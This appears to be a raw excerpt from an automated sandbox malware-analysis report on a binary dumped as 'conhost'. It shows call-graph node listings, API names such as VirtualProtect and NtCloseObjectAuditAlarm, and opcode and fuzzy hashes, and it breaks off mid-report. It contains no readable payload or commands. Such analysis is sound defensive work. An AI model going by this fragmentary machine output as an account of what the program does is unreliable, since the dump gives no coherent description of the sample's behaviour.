2139 14000121a 2135->2139 2136->2135 2137->2133 2137->2134 2138->2139 2155 140001880 2139->2155 2142 14000126a 2143 14000126f malloc 2142->2143 2144 14000128b 2143->2144 2146 1400012d0 2143->2146 2145 1400012a0 strlen malloc memcpy 2144->2145 2145->2145 2145->2146 2166 140003150 2146->2166 2148 140001315 2149 140001344 2148->2149 2150 140001324 2148->2150 2153 140001160 50 API calls 2149->2153 2151 140001338 2150->2151 2152 14000132d _cexit 2150->2152 2151->2131 2152->2151 2154 140001366 2153->2154 2154->2131 2156 140001247 SetUnhandledExceptionFilter 2155->2156 2157 1400018a2 2155->2157 2156->2142 2157->2156 2158 14000194d 2157->2158 2162 140001a20 2157->2162 2159 14000199e 2158->2159 2160 140001ba0 4 API calls 2158->2160 2159->2156 2161 1400019e9 VirtualProtect 2159->2161 2160->2158 2161->2159 2162->2159 2163 140001b53 2162->2163 2164 140001b36 2162->2164 2165 140001ba0 4 API calls 2164->2165 2165->2163 2168 140003166 2166->2168 2167 1400032cb wcslen 2240 14000153f 2167->2240 2168->2167 2171 1400034ce 2171->2148 2177 1400033c6 2178 14000346e wcslen 2177->2178 2179 140003484 2178->2179 2180 1400034cc 2178->2180 2179->2180 2182 1400034b6 wcslen 2179->2182 2181 140003591 wcscpy wcscat 2180->2181 2184 1400035c3 2181->2184 2182->2179 2182->2180 2183 140003613 wcscpy wcscat 2186 140003649 2183->2186 2184->2183 2185 14000375e wcscpy wcscat 2187 140003797 2185->2187 2186->2185 2188 140003afe wcslen 2187->2188 2189 140003b0c 2188->2189 2190 140003b4b 2188->2190 2189->2190 2192 140003b36 wcslen 2189->2192 2191 140003c5a wcscpy wcscat 2190->2191 2194 140003c8f 2191->2194 2192->2189 2192->2190 2193 140003cdf wcscpy wcscat 2196 140003d18 2193->2196 2194->2193 2195 140003d55 wcscpy wcscat 2198 140003d9c 2195->2198 2196->2195 2197 140003dee wcscpy wcscat wcslen 2380 14000146d 2197->2380 2198->2197 2203 140003f05 2466 1400014a9 2203->2466 2204 140004048 2205 14000145e 2 API calls 2204->2205 2212 140003f9c 2205->2212 2208 140004037 2213 14000145e 2 API calls 2208->2213 2209 140005747 2211 1400040da wcscpy wcscat wcslen 2235 1400041b0 2211->2235 2212->2209 2212->2211 2213->2212 2215 140003f90 2217 14000145e 2 API calls 2215->2217 2217->2212 2218 1400042a5 wcslen 2219 14000153f 2 API calls 2218->2219 2219->2235 2220 14000536a memcpy 2220->2235 2221 14000449b wcslen 2627 14000157b 2221->2627 2222 14000470d wcslen 2224 14000153f 2 API calls 2222->2224 2224->2235 2225 14000145e NtCloseObjectAuditAlarm malloc 2225->2235 2226 140005001 wcscpy wcscat wcslen 2227 140001422 2 API calls 2226->2227 2227->2235 2229 140004593 wcslen 2644 1400015a8 2229->2644 2232 140005143 2232->2148 2233 1400054cc memcpy 2233->2235 2234 1400026e0 9 API calls 2234->2235 2235->2218 2235->2220 2235->2221 2235->2222 2235->2225 2235->2226 2235->2229 2235->2232 2235->2233 2235->2234 2236 1400051ee wcslen 2235->2236 2238 140004e55 wcscpy wcscat wcslen 2235->2238 2582 1400014d6 2235->2582 2655 140001521 2235->2655 2753 140001431 2235->2753 2237 1400015a8 2 API calls 2236->2237 2237->2235 2684 140001422 2238->2684 2241 140001394 2 API calls 2240->2241 2242 14000154e 2241->2242 2243 140001394 2 API calls 2242->2243 2244 14000155d 2243->2244 2245 140001394 2 API calls 2244->2245 2246 14000156c 2245->2246 2247 140001394 2 API calls 2246->2247 2248 14000157b 2247->2248 2249 140001394 2 API calls 2248->2249 2250 14000158a 2249->2250 2251 140001394 2 API calls 2250->2251 2252 140001599 2251->2252 2253 140001394 2 API calls 2252->2253 2254 1400015a8 2253->2254 2255 140001394 2 API calls 2254->2255 2256 1400015b7 2255->2256 2257 140001394 2 API calls 2256->2257 2258 1400015c6 2257->2258 2259 140001394 2 API calls 2258->2259 2260 1400015d5 2259->2260 2261 140001394 2 API calls 2260->2261 2262 1400015e4 2261->2262 2263 140001394 2 API calls 2262->2263 2264 1400015f3 2263->2264 2264->2171 2265 140001503 2264->2265 2266 140001394 2 API calls 2265->2266 2267 14000150d 2266->2267 2268 140001394 2 API calls 2267->2268 2269 140001512 2268->2269 2270 140001394 2 API calls 2269->2270 2271 140001521 2270->2271 2272 140001394 2 API calls 2271->2272 2273 140001530 2272->2273 2274 140001394 2 API calls 2273->2274 2275 14000153f 2274->2275 2276 140001394 2 API calls 2275->2276 2277 14000154e 2276->2277 2278 140001394 2 API calls 2277->2278 2279 14000155d 2278->2279 2280 140001394 2 API calls 2279->2280 2281 14000156c 2280->2281 2282 140001394 2 API calls 2281->2282 2283 14000157b 2282->2283 2284 140001394 2 API calls 2283->2284 2285 14000158a 2284->2285 2286 140001394 2 API calls 2285->2286 2287 140001599 2286->2287 2288 140001394 2 API calls 2287->2288 2289 1400015a8 2288->2289 2290 140001394 2 API calls 2289->2290 2291 1400015b7 2290->2291 2292 140001394 2 API calls 2291->2292 2293 1400015c6 2292->2293 2294 140001394 2 API calls 2293->2294 2295 1400015d5 2294->2295 2296 140001394 2 API calls 2295->2296 2297 1400015e4 2296->2297 2298 140001394 2 API calls 2297->2298 2299 1400015f3 2298->2299 2299->2177 2300 14000156c 2299->2300 2301 140001394 2 API calls 2300->2301 2302 14000157b 2301->2302 2303 140001394 2 API calls 2302->2303 2304 14000158a 2303->2304 2305 140001394 2 API calls 2304->2305 2306 140001599 2305->2306 2307 140001394 2 API calls 2306->2307 2308 1400015a8 2307->2308 2309 140001394 2 API calls 2308->2309 2310 1400015b7 2309->2310 2311 140001394 2 API calls 2310->2311 2312 1400015c6 2311->2312 2313 140001394 2 API calls 2312->2313 2314 1400015d5 2313->2314 2315 140001394 2 API calls 2314->2315 2316 1400015e4 2315->2316 2317 140001394 2 API calls 2316->2317 2318 1400015f3 2317->2318 2318->2177 2319 14000145e 2318->2319 2320 140001394 2 API calls 2319->2320 2321 14000146d 2320->2321 2322 140001394 2 API calls 2321->2322 2323 14000147c 2322->2323 2324 140001394 2 API calls 2323->2324 2325 14000148b 2324->2325 2326 140001394 2 API calls 2325->2326 2327 14000149a 2326->2327 2328 140001394 2 API calls 2327->2328 2329 1400014a9 2328->2329 2330 140001394 2 API calls 2329->2330 2331 1400014b8 2330->2331 2332 140001394 2 API calls 2331->2332 2333 1400014c7 2332->2333 2334 140001394 2 API calls 2333->2334 2335 1400014d6 2334->2335 2336 1400014e5 2335->2336 2337 140001394 2 API calls 2335->2337 2338 140001394 2 API calls 2336->2338 2337->2336 2339 1400014ef 2338->2339 2340 1400014f4 2339->2340 2341 140001394 2 API calls 2339->2341 2342 140001394 2 API calls 2340->2342 2341->2340 2343 1400014fe 2342->2343 2344 140001503 2343->2344 2345 140001394 2 API calls 2343->2345 2346 140001394 2 API calls 2344->2346 2345->2344 2347 14000150d 2346->2347 2348 140001394 2 API calls 2347->2348 2349 140001512 2348->2349 2350 140001394 2 API calls 2349->2350 2351 140001521 2350->2351 2352 140001394 2 API calls 2351->2352 2353 140001530 2352->2353 2354 140001394 2 API calls 2353->2354 2355 14000153f 2354->2355 2356 140001394 2 API calls 2355->2356 2357 14000154e 2356->2357 2358 140001394 2 API calls 2357->2358 2359 14000155d 2358->2359 2360 140001394 2 API calls 2359->2360 2361 14000156c 2360->2361 2362 140001394 2 API calls 2361->2362 2363 14000157b 2362->2363 2364 140001394 2 API calls 2363->2364 2365 14000158a 2364->2365 2366 140001394 2 API calls 2365->2366 2367 140001599 2366->2367 2368 140001394 2 API calls 2367->2368 2369 1400015a8 2368->2369 2370 140001394 2 API calls 2369->2370 2371 1400015b7 2370->2371 2372 140001394 2 API calls 2371->2372 2373 1400015c6 2372->2373 2374 140001394 2 API calls 2373->2374 2375 1400015d5 2374->2375 2376 140001394 2 API calls 2375->2376 2377 1400015e4 2376->2377 2378 140001394 2 API calls 2377->2378 2379 1400015f3 2378->2379 2379->2177 2381 140001394 2 API calls 2380->2381 2382 14000147c 2381->2382 2383 140001394 2 API calls 2382->2383 2384 14000148b 2383->2384 2385 140001394 2 API calls 2384->2385 2386 14000149a 2385->2386 2387 140001394 2 API calls 2386->2387 2388 1400014a9 2387->2388 2389 140001394 2 API calls 2388->2389 2390 1400014b8 2389->2390 2391 140001394 2 API calls 2390->2391 2392 1400014c7 2391->2392 2393 140001394 2 API calls 2392->2393 2394 1400014d6 2393->2394 2395 1400014e5 2394->2395 2396 140001394 2 API calls 2394->2396 2397 140001394 2 API calls 2395->2397 2396->2395 2398 1400014ef 2397->2398 2399 1400014f4 2398->2399 2400 140001394 2 API calls 2398->2400 2401 140001394 2 API calls 2399->2401 2400->2399 2402 1400014fe 2401->2402 2403 140001503 2402->2403 2404 140001394 2 API calls 2402->2404 2405 140001394 2 API calls 2403->2405 2404->2403 2406 14000150d 2405->2406 2407 140001394 2 API calls 2406->2407 2408 140001512 2407->2408 2409 140001394 2 API calls 2408->2409 2410 140001521 2409->2410 2411 140001394 2 API calls 2410->2411 2412 140001530 2411->2412 2413 140001394 2 API calls 2412->2413 2414 14000153f 2413->2414 2415 140001394 2 API calls 2414->2415 2416 14000154e 2415->2416 2417 140001394 2 API calls 2416->2417 2418 14000155d 2417->2418 2419 140001394 2 API calls 2418->2419 2420 14000156c 2419->2420 2421 140001394 2 API calls 2420->2421 2422 14000157b 2421->2422 2423 140001394 2 API calls 2422->2423 2424 14000158a 2423->2424 2425 140001394 2 API calls 2424->2425 2426 140001599 2425->2426 2427 140001394 2 API calls 2426->2427 2428 1400015a8 2427->2428 2429 140001394 2 API calls 2428->2429 2430 1400015b7 2429->2430 2431 140001394 2 API calls 2430->2431 2432 1400015c6 2431->2432 2433 140001394 2 API calls 2432->2433 2434 1400015d5 2433->2434 2435 140001394 2 API calls 2434->2435 2436 1400015e4 2435->2436 2437 140001394 2 API calls 2436->2437 2438 1400015f3 2437->2438 2438->2212 2439 140001530 2438->2439 2440 140001394 2 API calls 2439->2440 2441 14000153f 2440->2441 2442 140001394 2 API calls 2441->2442 2443 14000154e 2442->2443 2444 140001394 2 API calls 2443->2444 2445 14000155d 2444->2445 2446 140001394 2 API calls 2445->2446 2447 14000156c 2446->2447 2448 140001394 2 API calls 2447->2448 2449 14000157b 2448->2449 2450 140001394 2 API calls 2449->2450 2451 14000158a 2450->2451 2452 140001394 2 API calls 2451->2452 2453 140001599 2452->2453 2454 140001394 2 API calls 2453->2454 2455 1400015a8 2454->2455 2456 140001394 2 API calls 2455->2456 2457 1400015b7 2456->2457 2458 140001394 2 API calls 2457->2458 2459 1400015c6 2458->2459 2460 140001394 2 API calls 2459->2460 2461 1400015d5 2460->2461 2462 140001394 2 API calls 2461->2462 2463 1400015e4 2462->2463 2464 140001394 2 API calls 2463->2464 2465 1400015f3 2464->2465 2465->2203 2465->2204 2467 140001394 2 API calls 2466->2467 2468 1400014b8 2467->2468 2469 140001394 2 API calls 2468->2469 2470 1400014c7 2469->2470 2471 140001394 2 API calls 2470->2471 2472 1400014d6 2471->2472 2473 1400014e5 2472->2473 2474 140001394 2 API calls 2472->2474 2475 140001394 2 API calls 2473->2475 2474->2473 2476 1400014ef 2475->2476 2477 1400014f4 2476->2477 2478 140001394 2 API calls 2476->2478 2479 140001394 2 API calls 2477->2479 2478->2477 2480 1400014fe 2479->2480 2481 140001503 2480->2481 2482 140001394 2 API calls 2480->2482 2483 140001394 2 API calls 2481->2483 2482->2481 2484 14000150d 2483->2484 2485 140001394 2 API calls 2484->2485 2486 140001512 2485->2486 2487 140001394 2 API calls 2486->2487 2488 140001521 2487->2488 2489 140001394 2 API calls 2488->2489 2490 140001530 2489->2490 2491 140001394 2 API calls 2490->2491 2492 14000153f 2491->2492 2493 140001394 2 API calls 2492->2493 2494 14000154e 2493->2494 2495 140001394 2 API calls 2494->2495 2496 14000155d 2495->2496 2497 140001394 2 API calls 2496->2497 2498 14000156c 2497->2498 2499 140001394 2 API calls 2498->2499 2500 14000157b 2499->2500 2501 140001394 2 API calls 2500->2501 2502 14000158a 2501->2502 2503 140001394 2 API calls 2502->2503 2504 140001599 2503->2504 2505 140001394 2 API calls 2504->2505 2506 1400015a8 2505->2506 2507 140001394 2 API calls 2506->2507 2508 1400015b7 2507->2508 2509 140001394 2 API calls 2508->2509 2510 1400015c6 2509->2510 2511 140001394 2 API calls 2510->2511 2512 1400015d5 2511->2512 2513 140001394 2 API calls 2512->2513 2514 1400015e4 2513->2514 2515 140001394 2 API calls 2514->2515 2516 1400015f3 2515->2516 2516->2208 2517 140001440 2516->2517 2518 140001394 2 API calls 2517->2518 2519 14000144f 2518->2519 2520 140001394 2 API calls 2519->2520 2521 14000145e 2520->2521 2522 140001394 2 API calls 2521->2522 2523 14000146d 2522->2523 2524 140001394 2 API calls 2523->2524 2525 14000147c 2524->2525 2526 140001394 2 API calls 2525->2526 2527 14000148b 2526->2527 2528 140001394 2 API calls 2527->2528 2529 14000149a 2528->2529 2530 140001394 2 API calls 2529->2530 2531 1400014a9 2530->2531 2532 140001394 2 API calls 2531->2532 2533 1400014b8 2532->2533 2534 140001394 2 API calls 2533->2534 2535 1400014c7 2534->2535 2536 140001394 2 API calls 2535->2536 2537 1400014d6 2536->2537 2538 1400014e5 2537->2538 2539 140001394 2 API calls 2537->2539 2540 140001394 2 API calls 2538->2540 2539->2538 2541 1400014ef 2540->2541 2542 1400014f4 2541->2542 2543 140001394 2 API calls 2541->2543 2544 140001394 2 API calls 2542->2544 2543->2542 2545 1400014fe 2544->2545 2546 140001503 2545->2546 2547 140001394 2 API calls 2545->2547 2548 140001394 2 API calls 2546->2548 2547->2546 2549 14000150d 2548->2549 2550 140001394 2 API calls 2549->2550 2551 140001512 2550->2551 2552 140001394 2 API calls 2551->2552 2553 140001521 2552->2553 2554 140001394 2 API calls 2553->2554 2555 140001530 2554->2555 2556 140001394 2 API calls 2555->2556 2557 14000153f 2556->2557 2558 140001394 2 API calls 2557->2558 2559 14000154e 2558->2559 2560 140001394 2 API calls 2559->2560 2561 14000155d 2560->2561 2562 140001394 2 API calls 2561->2562 2563 14000156c 2562->2563 2564 140001394 2 API calls 2563->2564 2565 14000157b 2564->2565 2566 140001394 2 API calls 2565->2566 2567 14000158a 2566->2567 2568 140001394 2 API calls 2567->2568 2569 140001599 2568->2569 2570 140001394 2 API calls 2569->2570 2571 1400015a8 2570->2571 2572 140001394 2 API calls 2571->2572 2573 1400015b7 2572->2573 2574 140001394 2 API calls 2573->2574 2575 1400015c6 2574->2575 2576 140001394 2 API calls 2575->2576 2577 1400015d5 2576->2577 2578 140001394 2 API calls 2577->2578 2579 1400015e4 2578->2579 2580 140001394 2 API calls 2579->2580 2581 1400015f3 2580->2581 2581->2208 2581->2215 2583 1400014e5 2582->2583 2584 140001394 2 API calls 2582->2584 2585 140001394 2 API calls 2583->2585 2584->2583 2586 1400014ef 2585->2586 2587 1400014f4 2586->2587 2588 140001394 2 API calls 2586->2588 2589 140001394 2 API calls 2587->2589 2588->2587 2590 1400014fe 2589->2590 2591 140001503 2590->2591 2592 140001394 2 API calls 2590->2592 2593 140001394 2 API calls 2591->2593 2592->2591 2594 14000150d 2593->2594 2595 140001394 2 API calls 2594->2595 2596 140001512 2595->2596 2597 140001394 2 API calls 2596->2597 2598 140001521 2597->2598 2599 140001394 2 API calls 2598->2599 2600 140001530 2599->2600 2601 140001394 2 API calls 2600->2601 2602 14000153f 2601->2602 2603 140001394 2 API calls 2602->2603 2604 14000154e 2603->2604 2605 140001394 2 API calls 2604->2605 2606 14000155d 2605->2606 2607 140001394 2 API calls 2606->2607 2608 14000156c 2607->2608 2609 140001394 2 API calls 2608->2609 2610 14000157b 2609->2610 2611 140001394 2 API calls 2610->2611 2612 14000158a 2611->2612 2613 140001394 2 API calls 2612->2613 2614 140001599 2613->2614 2615 140001394 2 API calls 2614->2615 2616 1400015a8 2615->2616 2617 140001394 2 API calls 2616->2617 2618 1400015b7 2617->2618 2619 140001394 2 API calls 2618->2619 2620 1400015c6 2619->2620 2621 140001394 2 API calls 2620->2621 2622 1400015d5 2621->2622 2623 140001394 2 API calls 2622->2623 2624 1400015e4 2623->2624 2625 140001394 2 API calls 2624->2625 2626 1400015f3 2625->2626 2626->2235 2628 140001394 2 API calls 2627->2628 2629 14000158a 2628->2629 2630 140001394 2 API calls 2629->2630 2631 140001599 2630->2631 2632 140001394 2 API calls 2631->2632 2633 1400015a8 2632->2633 2634 140001394 2 API calls 2633->2634 2635 1400015b7 2634->2635 2636 140001394 2 API calls 2635->2636 2637 1400015c6 2636->2637 2638 140001394 2 API calls 2637->2638 2639 1400015d5 2638->2639 2640 140001394 2 API calls 2639->2640 2641 1400015e4 2640->2641 2642 140001394 2 API calls 2641->2642 2643 1400015f3 2642->2643 2643->2235 2645 140001394 2 API calls 2644->2645 2646 1400015b7 2645->2646 2647 140001394 2 API calls 2646->2647 2648 1400015c6 2647->2648 2649 140001394 2 API calls 2648->2649 2650 1400015d5 2649->2650 2651 140001394 2 API calls 2650->2651 2652 1400015e4 2651->2652 2653 140001394 2 API calls 2652->2653 2654 1400015f3 2653->2654 2654->2235 2656 140001394 2 API calls 2655->2656 2657 140001530 2656->2657 2658 140001394 2 API calls 2657->2658 2659 14000153f 2658->2659 2660 140001394 2 API calls 2659->2660 2661 14000154e 2660->2661 2662 140001394 2 API calls 2661->2662 2663 14000155d 2662->2663 2664 140001394 2 API calls 2663->2664 2665 14000156c 2664->2665 2666 140001394 2 API calls 2665->2666 2667 14000157b 2666->2667 2668 140001394 2 API calls 2667->2668 2669 14000158a 2668->2669 2670 140001394 2 API calls 2669->2670 2671 140001599 2670->2671 2672 140001394 2 API calls 2671->2672 2673 1400015a8 2672->2673 2674 140001394 2 API calls 2673->2674 2675 1400015b7 2674->2675 2676 140001394 2 API calls 2675->2676 2677 1400015c6 2676->2677 2678 140001394 2 API calls 2677->2678 2679 1400015d5 2678->2679 2680 140001394 2 API calls 2679->2680 2681 1400015e4 2680->2681 2682 140001394 2 API calls 2681->2682 2683 1400015f3 2682->2683 2683->2235 2685 140001394 2 API calls 2684->2685 2686 140001431 2685->2686 2687 140001394 2 API calls 2686->2687 2688 140001440 2687->2688 2689 140001394 2 API calls 2688->2689 2690 14000144f 2689->2690 2691 140001394 2 API calls 2690->2691 2692 14000145e 2691->2692 2693 140001394 2 API calls 2692->2693 2694 14000146d 2693->2694 2695 140001394 2 API calls 2694->2695 2696 14000147c 2695->2696 2697 140001394 2 API calls 2696->2697 2698 14000148b 2697->2698 2699 140001394 2 API calls 2698->2699 2700 14000149a 2699->2700 2701 140001394 2 API calls 2700->2701 2702 1400014a9 2701->2702 2703 140001394 2 API calls 2702->2703 2704 1400014b8 2703->2704 2705 140001394 2 API calls 2704->2705 2706 1400014c7 2705->2706 2707 140001394 2 API calls 2706->2707 2708 1400014d6 2707->2708 2709 1400014e5 2708->2709 2710 140001394 2 API calls 2708->2710 2711 140001394 2 API calls 2709->2711 2710->2709 2712 1400014ef 2711->2712 2713 1400014f4 2712->2713 2714 140001394 2 API calls 2712->2714 2715 140001394 2 API calls 2713->2715 2714->2713 2716 1400014fe 2715->2716 2717 140001503 2716->2717 2718 140001394 2 API calls 2716->2718 2719 140001394 2 API calls 2717->2719 2718->2717 2720 14000150d 2719->2720 2721 140001394 2 API calls 2720->2721 2722 140001512 2721->2722 2723 140001394 2 API calls 2722->2723 2724 140001521 2723->2724 2725 140001394 2 API calls 2724->2725 2726 140001530 2725->2726 2727 140001394 2 API calls 2726->2727 2728 14000153f 2727->2728 2729 140001394 2 API calls 2728->2729 2730 14000154e 2729->2730 2731 140001394 2 API calls 2730->2731 2732 14000155d 2731->2732 2733 140001394 2 API calls 2732->2733 2734 14000156c 2733->2734 2735 140001394 2 API calls 2734->2735 2736 14000157b 2735->2736 2737 140001394 2 API calls 2736->2737 2738 14000158a 2737->2738 2739 140001394 2 API calls 2738->2739 2740 140001599 2739->2740 2741 140001394 2 API calls 2740->2741 2742 1400015a8 2741->2742 2743 140001394 2 API calls 2742->2743 2744 1400015b7 2743->2744 2745 140001394 2 API calls 2744->2745 2746 1400015c6 2745->2746 2747 140001394 2 API calls 2746->2747 2748 1400015d5 2747->2748 2749 140001394 2 API calls 2748->2749 2750 1400015e4 2749->2750 2751 140001394 2 API calls 2750->2751 2752 1400015f3 2751->2752 2752->2235 2754 140001394 2 API calls 2753->2754 2755 140001440 2754->2755 2756 140001394 2 API calls 2755->2756 2757 14000144f 2756->2757 2758 140001394 2 API calls 2757->2758 2759 14000145e 2758->2759 2760 140001394 2 API calls 2759->2760 2761 14000146d 2760->2761 2762 140001394 2 API calls 2761->2762 2763 14000147c 2762->2763 2764 140001394 2 API calls 2763->2764 2765 14000148b 2764->2765 2766 140001394 2 API calls 2765->2766 2767 14000149a 2766->2767 2768 140001394 2 API calls 2767->2768 2769 1400014a9 2768->2769 2770 140001394 2 API calls 2769->2770 2771 1400014b8 2770->2771 2772 140001394 2 API calls 2771->2772 2773 1400014c7 2772->2773 2774 140001394 2 API calls 2773->2774 2775 1400014d6 2774->2775 2776 1400014e5 2775->2776 2777 140001394 2 API calls 2775->2777 2778 140001394 2 API calls 2776->2778 2777->2776 2779 1400014ef 2778->2779 2780 1400014f4 2779->2780 2781 140001394 2 API calls 2779->2781 2782 140001394 2 API calls 2780->2782 2781->2780 2783 1400014fe 2782->2783 2784 140001503 2783->2784 2785 140001394 2 API calls 2783->2785 2786 140001394 2 API calls 2784->2786 2785->2784 2787 14000150d 2786->2787 2788 140001394 2 API calls 2787->2788 2789 140001512 2788->2789 2790 140001394 2 API calls 2789->2790 2791 140001521 2790->2791 2792 140001394 2 API calls 2791->2792 2793 140001530 2792->2793 2794 140001394 2 API calls 2793->2794 2795 14000153f 2794->2795 2796 140001394 2 API calls 2795->2796 2797 14000154e 2796->2797 2798 140001394 2 API calls 2797->2798 2799 14000155d 2798->2799 2800 140001394 2 API calls 2799->2800 2801 14000156c 2800->2801 2802 140001394 2 API calls 2801->2802 2803 14000157b 2802->2803 2804 140001394 2 API calls 2803->2804 2805 14000158a 2804->2805 2806 140001394 2 API calls 2805->2806 2807 140001599 2806->2807 2808 140001394 2 API calls 2807->2808 2809 1400015a8 2808->2809 2810 140001394 2 API calls 2809->2810 2811 1400015b7 2810->2811 2812 140001394 2 API calls 2811->2812 2813 1400015c6 2812->2813 2814 140001394 2 API calls 2813->2814 2815 1400015d5 2814->2815 2816 140001394 2 API calls 2815->2816 2817 1400015e4 2816->2817 2818 140001394 2 API calls 2817->2818 2819 1400015f3 2818->2819 2819->2235

                                                                                            Callgraph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            • Opacity -> Relevance
                                                                                            • Disassembly available
                                                                                            callgraph 0 Function_00000001400059E1 1 Function_00000001400058E1 2 Function_00000001400057E1 3 Function_0000000140001AE4 33 Function_0000000140001D40 3->33 73 Function_0000000140001BA0 3->73 4 Function_00000001400014E5 68 Function_0000000140001394 4->68 5 Function_00000001400010F0 6 Function_00000001400030F1 7 Function_00000001400014F4 7->68 8 Function_0000000140002500 9 Function_0000000140001800 63 Function_0000000140002290 9->63 10 Function_0000000140001000 11 Function_0000000140001E00 10->11 37 Function_0000000140001750 10->37 79 Function_0000000140001FB0 10->79 86 Function_0000000140001FC0 10->86 12 Function_0000000140002F00 53 Function_0000000140001370 12->53 13 Function_0000000140005801 14 Function_0000000140001503 14->68 15 Function_0000000140001404 15->68 16 Function_0000000140002104 17 Function_0000000140001E10 18 Function_0000000140003110 19 Function_0000000140005911 20 Function_0000000140001512 20->68 21 Function_0000000140002420 22 Function_0000000140002320 23 Function_0000000140001521 23->68 24 Function_0000000140005A21 25 Function_0000000140001422 25->68 26 Function_0000000140001530 26->68 27 Function_0000000140003130 28 Function_0000000140001431 28->68 29 Function_0000000140005831 30 Function_000000014000153F 30->68 31 Function_0000000140001440 31->68 32 Function_0000000140001140 47 Function_0000000140001160 32->47 33->63 34 Function_0000000140001F47 54 Function_0000000140001870 34->54 35 Function_0000000140002050 36 Function_0000000140001650 38 Function_0000000140003150 38->12 38->14 38->23 38->25 38->26 38->28 38->30 38->31 43 Function_000000014000145E 38->43 45 Function_0000000140002660 38->45 50 Function_000000014000156C 38->50 51 Function_000000014000146D 38->51 38->53 58 Function_000000014000157B 38->58 72 Function_0000000140005AA0 38->72 75 Function_00000001400015A8 38->75 76 Function_00000001400014A9 38->76 85 Function_00000001400016C0 38->85 97 Function_00000001400014D6 38->97 99 Function_00000001400026E0 38->99 39 Function_0000000140003051 40 Function_0000000140005851 41 Function_0000000140005951 42 Function_000000014000155D 42->68 43->68 44 Function_0000000140002460 46 Function_0000000140005D60 46->72 47->38 47->47 47->54 59 Function_0000000140001880 47->59 62 Function_0000000140001F90 47->62 47->85 48 Function_0000000140001760 100 Function_00000001400020E0 48->100 49 Function_0000000140001E65 49->54 50->68 51->68 52 Function_000000014000216F 55 Function_0000000140001A70 55->33 55->73 56 Function_0000000140003070 57 Function_0000000140005871 58->68 59->21 59->33 59->45 59->73 60 Function_0000000140005A80 61 Function_0000000140005781 64 Function_0000000140002590 65 Function_0000000140003090 66 Function_0000000140002691 67 Function_0000000140005891 68->46 77 Function_0000000140005AB0 68->77 69 Function_0000000140002194 69->54 70 Function_000000014000219E 71 Function_0000000140001FA0 73->33 78 Function_00000001400023B0 73->78 93 Function_00000001400024D0 73->93 74 Function_00000001400057A1 75->68 76->68 77->72 80 Function_00000001400022B0 81 Function_00000001400026B0 82 Function_00000001400030B1 83 Function_00000001400058B1 84 Function_0000000140001AB3 84->33 84->73 87 Function_00000001400058C0 88 Function_00000001400057C1 89 Function_00000001400059C1 90 Function_0000000140001AC3 90->33 90->73 91 Function_00000001400014C7 91->68 92 Function_00000001400026D0 94 Function_00000001400017D0 95 Function_0000000140001FD0 96 Function_0000000140001AD4 96->33 96->73 97->68 98 Function_00000001400022E0 99->4 99->7 99->14 99->20 99->42 99->43 99->45 99->53 99->72 99->76 99->91 101 Function_00000001400017E0 101->100

                                                                                            Executed Functions

                                                                                            Function 0000000140001394 Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • NtCloseObjectAuditAlarm.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001156), ref: 00000001400013F7
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000025.00000002.3819784484.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                            • Associated: 00000025.00000002.3819618588.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000025.00000002.3819907371.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000025.00000002.3820019209.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000025.00000002.3820138040.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_37_2_140000000_conhost.jbxd
                                                                                            Similarity
                                                                                            • API ID: AlarmAuditCloseObject
                                                                                            • String ID:
                                                                                            • API String ID: 2871759311-0
                                                                                            • Opcode ID: f55b75a42ba742ff66446f778846a6b7bb42d2851d26ad5f09de16630c5a37b5
                                                                                            • Instruction ID: e01ed9b63ef7c5920134c4e85c14ad27842d35840c28d74b04fb6c154e59ead0
                                                                                            • Opcode Fuzzy Hash: f55b75a42ba742ff66446f778846a6b7bb42d2851d26ad5f09de16630c5a37b5
                                                                                            • Instruction Fuzzy Hash: 6CF0AFB2608B408AEA12DF52F89579A77A0F38D7C0F00991ABBC843735DB3CC190CB80

                                                                                            Non-executed Functions

                                                                                            Function 00000001400026E0 Relevance: 19.6, APIs: 7, Strings: 4, Instructions: 376COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 311 1400026e0-14000273b call 140002660 315 140002741-14000274b 311->315 316 14000280e-14000285e call 14000155d 311->316 318 140002774-14000277a 315->318 323 140002953-14000297b call 1400014c7 316->323 324 140002864-140002873 316->324 318->316 319 140002780-140002787 318->319 321 140002789-140002792 319->321 322 140002750-140002752 319->322 326 140002794-1400027ab 321->326 327 1400027f8-1400027fb 321->327 325 14000275a-14000276e 322->325 339 140002986-1400029c8 call 140001503 call 140005aa0 323->339 340 14000297d 323->340 329 140002eb7-140002ef4 call 140001370 324->329 330 140002879-140002888 324->330 325->316 325->318 333 1400027f5 326->333 334 1400027ad-1400027c2 326->334 327->325 331 1400028e4-14000294e wcsncmp call 1400014e5 330->331 332 14000288a-1400028dd 330->332 331->323 332->331 333->327 338 1400027d0-1400027d7 334->338 342 1400027d9-1400027f3 338->342 343 140002800-140002809 338->343 349 140002e49-140002e84 call 140001370 339->349 350 1400029ce-1400029d5 339->350 340->339 342->333 342->338 343->325 353 1400029d7-140002a0c 349->353 358 140002e8a 349->358 352 140002a13-140002a43 wcscpy wcscat wcslen 350->352 350->353 354 140002a45-140002a76 wcslen 352->354 355 140002a78-140002aa5 352->355 353->352 357 140002aa8-140002abf wcslen 354->357 355->357 359 140002ac5-140002ad8 357->359 360 140002e8f-140002eab call 140001370 357->360 358->352 362 140002af5-140002dfb wcslen call 1400014a9 * 2 call 1400014f4 call 1400014c7 * 2 call 14000145e * 3 359->362 363 140002ada-140002aee 359->363 360->329 381 140002dfd-140002e1b call 140001512 362->381 382 140002e20-140002e48 call 14000145e 362->382 363->362 381->382
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
